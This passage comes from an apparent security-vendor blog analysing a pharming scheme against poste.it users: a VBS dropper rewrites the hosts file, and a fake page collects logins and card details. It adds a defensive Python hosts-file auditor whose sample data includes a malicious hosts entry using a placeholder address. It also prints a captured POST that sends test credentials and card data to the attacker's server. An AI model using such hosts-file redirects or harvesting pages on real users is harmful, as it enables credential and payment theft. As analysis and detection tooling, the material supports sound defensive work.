    This launches Internet Explorer on the bank’s main page with what looks like the correct address in the browser’s address bar; the name, however, now resolves to the attacker’s IP planted in the modified hosts file. At this stage the unaware user enters his or her information on the page, and it is sent to a remote location that is certainly not the bank’s secure environment. All of this happens silently, without any cmd windows popping up, ActiveX warnings from IE, or other suspicious activity. Note that the whole exchange in the trace below runs over plain HTTP: a hosts-file redirect cannot give the attacker a valid certificate for the bank’s name, so the missing padlock is the one tell a careful user has.
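    The hosts file is consulted before DNS, so a single line is all it takes to make the bank’s real hostname land on the attacker’s server. The following Python is an added example, not code from the original post or from McAfee: it parses a hosts file and reports every name pinned to an address outside the loopback/unspecified range, distinguishing RFC 1918 addresses (common in corporate images) from external ones. The sample file is constructed; 198.51.100.23 is a documentation-range placeholder for the attacker’s IP, and the poste.it names are used because that is the Host header seen in the trace below.

```python
"""Audit a hosts file for pharming entries of the kind the VBS dropper above
plants: public hostnames pinned to an address the attacker controls.
Added example; SAMPLE_HOSTS is constructed, not a real capture."""
import ipaddress
import sys
from pathlib import Path

# Names the stock hosts file legitimately carries.
BENIGN_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}

# Internal ranges a corporate image may legitimately pin; anything else that
# is reachable is reported as external.
INTERNAL_NETWORKS = [ipaddress.ip_network(n) for n in
                     ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7")]

# Constructed sample. 198.51.100.23 is an RFC 5737 placeholder for the
# attacker's server; the poste.it names mirror the Host header in the trace.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2006 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example.net            # sinkhole, not pharming
10.0.0.5        intranet.example.internal  # pinned internal host
198.51.100.23   poste.it www.poste.it      # pharming entry b.txt delivered
"""


def parse_hosts(text):
    """Yield (lineno, ip_text, [names]) for each non-blank, non-comment line."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        fields = line.split()
        if len(fields) >= 2:
            yield lineno, fields[0], [n.lower() for n in fields[1:]]


def classify(ip_text):
    """'local' for loopback/unspecified/link-local, 'internal' for RFC 1918 and
    fc00::/7, 'external' otherwise, None if the field is not an address."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return None
    if ip.is_loopback or ip.is_unspecified or ip.is_link_local:
        return "local"
    if any(ip in net for net in INTERNAL_NETWORKS):
        return "internal"
    return "external"


def suspicious_entries(text):
    """Return (lineno, ip, name, scope) for every name steered to a reachable
    address. Sinkholing to 127.0.0.1/0.0.0.0 is a common ad-blocking idiom and
    is deliberately not reported."""
    hits = []
    for lineno, ip_text, names in parse_hosts(text):
        scope = classify(ip_text)
        if scope in (None, "local"):
            continue
        for name in names:
            if name not in BENIGN_NAMES:
                hits.append((lineno, ip_text, name, scope))
    return hits


if __name__ == "__main__":
    # Pass the real file to audit a machine, e.g.
    # %SystemRoot%\System32\drivers\etc\hosts on Windows or /etc/hosts elsewhere.
    text = Path(sys.argv[1]).read_text() if len(sys.argv) > 1 else SAMPLE_HOSTS
    for lineno, ip, name, scope in suspicious_entries(text):
        print(f"line {lineno}: {name} -> {ip} ({scope})")
```

    An “external” hit for a banking or webmail hostname is the signature of exactly the trick this sample pulls; “internal” hits are worth a glance but are often legitimate. The check is only as good as its input, so on a live machine read the file with a tool you trust rather than one the suspect binary may have tampered with.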

    If we look at a packet-sniffer trace, we can see the POST request made to the URL mentioned in the snippet above. It was registered through (no kidding!) Godaddy.com. We can also see all the requests made to the IP written into the hosts file by the VBS script, including a POST containing the username, password, card number with its security code, and expiry date. (In this case you can see that the Avert Labs account with password “testing” is now officially owned.) ;-)

    POST /index.php?MfcISAPICommand=ProcessCC&UsingSSL=1&login=AVERTLABS&
    pass=TESTING HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
    Referer: http://X.X.X.X/index.php?MfcISAPICommand=VerifyFPP&UsingSSL=1&login=&pass=
    Accept-Language: en-us
    Content-Type: application/x-www-form-urlencoded
    UA-CPU: x86
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: poste.it
    Content-Length: 165
    Connection: Keep-Alive
    Cache-Control: no-cache

    Session=cvv2.gif&password=TESTING&ccnumber=6666666666666666&
    month=10&year=10&
    cvv=666&__EVENTTARGET=RicaricaCartaPPayPagamentoPPayEdit1%3AbtnContinua&__EVENTARGUMENT=

    HTTP/1.1 200 OK
    Date: Fri, 14 Mar 2008 18:00:39 GMT
    Server: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.0-8
    X-Powered-By: PHP/5.2.0-8
    Keep-Alive: timeout=15, max=100
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=ISO-8859-1

    It seems that phishing will remain a part of our daily lives. What is most alarming is the ease with which someone could change a few lines of the script to redirect users to any other site that requires authentication and grab very sensitive information, which could be used to steal money as well as any other kind of data.

    So far the Web site hosting the modifications for the hosts file and the IP hosting the fake pages are both still live and collecting data, so you can imagine how much could be gathered in just a few days, or even a few hours. The reverse DNS details for the IP appear to be forged. We have contacted the owner of the IP and the bank itself to investigate further and have the fake site shut down as soon as possible.
    The hosts visit.geocities.com and geo.yahoo.com were involved as well, probably for tracking purposes.

    Safe banking, folks!